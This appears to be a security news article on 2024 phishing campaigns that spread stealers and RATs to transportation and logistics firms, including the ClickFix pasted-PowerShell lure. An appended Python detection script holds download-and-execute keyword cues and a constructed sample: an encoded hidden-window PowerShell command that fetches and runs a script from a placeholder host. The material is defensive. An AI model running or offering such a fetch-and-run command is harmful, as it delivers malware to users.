Transportation and logistics companies across North America are facing a new wave of phishing attacks delivering information-stealing malware and remote access trojans (RATs). According to recent reports, these campaigns exploit legitimate email accounts from compromised transport and shipping companies to inject malicious content directly into ongoing email threads.
So far, at least 15 breached email accounts have been identified as part of this phishing scheme. However, the method by which these accounts were initially hacked and the identity of the attackers remain unclear.
The attacks, which primarily occurred between May and July 2024, largely spread Lumma Stealer, StealC, and NetSupport malware, according to a recent analysis. However, in August 2024, the attackers shifted tactics, adopting new infrastructure and methods, introducing malware such as DanaBot and Arechclient2.
The phishing emails often contain internet shortcuts (.URL files) or links to Google Drive that download the malware when opened. In one variant of the attack observed in August 2024, the attackers utilized a technique called ClickFix.
This method tricks victims into downloading DanaBot by pretending to solve a display issue in their web browser. Victims are encouraged to paste a Base64-encoded PowerShell script into their terminal, initiating the malware download.
These campaigns have impersonated various transportation management software, such as Samsara and Astra TMS, to make the phishing attempts appear credible. The deliberate targeting of companies in the transportation and logistics sector suggests that the attackers conduct thorough research into their victims’ operations before launching these attacks.
This cyber campaign unfolds amid the rise of numerous stealer malware strains, including Angry Stealer, Poseidon, Luxy, and CryptBot variants. Additionally, a more sophisticated version of the RomCom RAT, dubbed SnipBot, has emerged.
Distributed through phishing emails with malicious links or fake PDFs, SnipBot allows attackers to run commands and download further malicious modules onto victims’ systems. While RomCom has been linked to ransomware in the past, recent incidents suggest the threat group behind it may be shifting from financial crime to espionage.
To prevent falling victim to these attacks, transportation companies should prioritize cybersecurity training for employees, particularly around phishing threats. Implementing multi-factor authentication (MFA) for all email accounts and monitoring network activity for suspicious behavior are essential steps.
Finally, using endpoint security solutions that scan for malware and limit the damage from infections can significantly reduce the risk of successful attacks.
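The ClickFix lure described above (a user pasting a Base64-encoded PowerShell command) and the recommendation to monitor for suspicious behaviour meet in process-creation telemetry. As an added illustration, not code from the article or from any vendor, the following Python triages constructed Sysmon-style process-creation records: it decodes the `-EncodedCommand` payload (UTF-16LE, then Base64, as PowerShell expects) and flags a hidden-window launch from an interactive parent whose decoded script fetches or executes remote content. The sample records and the placeholder URL are constructed for the example.

```python
import base64
import re
# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -en, -enc, ...); match the
# switch loosely and require a Base64-looking token of realistic length after it.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
DOWNLOAD_CUES = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
                 "net.webclient", "invoke-expression", "iex ", "curl ")
INTERACTIVE_PARENTS = ("explorer.exe", "cmd.exe", "windowsterminal.exe")

def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded payload, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(event: dict) -> list:
    """List the reasons a process-creation event resembles a ClickFix-style pasted command."""
    reasons = []
    cmd = event["cmdline"]
    if re.search(r"(?i)(^|\s)-w(?:indowstyle)?\s+hidden", cmd):
        reasons.append("hidden window requested")
    script = decode_encoded_command(cmd)
    if script is not None:
        reasons.append("base64-encoded command")
        if any(cue in script.lower() for cue in DOWNLOAD_CUES):
            reasons.append("decoded script fetches or executes remote content")
        parent = event["parent"].lower().rsplit("\\", 1)[-1]
        if parent in INTERACTIVE_PARENTS:
            reasons.append("interactive parent, consistent with a pasted command")
    return reasons

def flagged(events: list) -> list:
    """Return (cmdline, reasons) for every event that scored at least one reason."""
    return [(e["cmdline"], r) for e in events if (r := score_event(e))]

# Constructed Sysmon-style process-creation records (placeholder URL, not real IoCs).
SAMPLE_EVENTS = [
    {"parent": "C:\\Windows\\explorer.exe",
     "cmdline": "powershell -w hidden -enc " + encode_ps(
         "Invoke-WebRequest http://placeholder.invalid/fix.ps1 | Invoke-Expression")},
    {"parent": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
]
```

The second record, a scheduled administrative script, produces no reasons, which is the point of scoring on the combination of signals rather than on the presence of PowerShell alone.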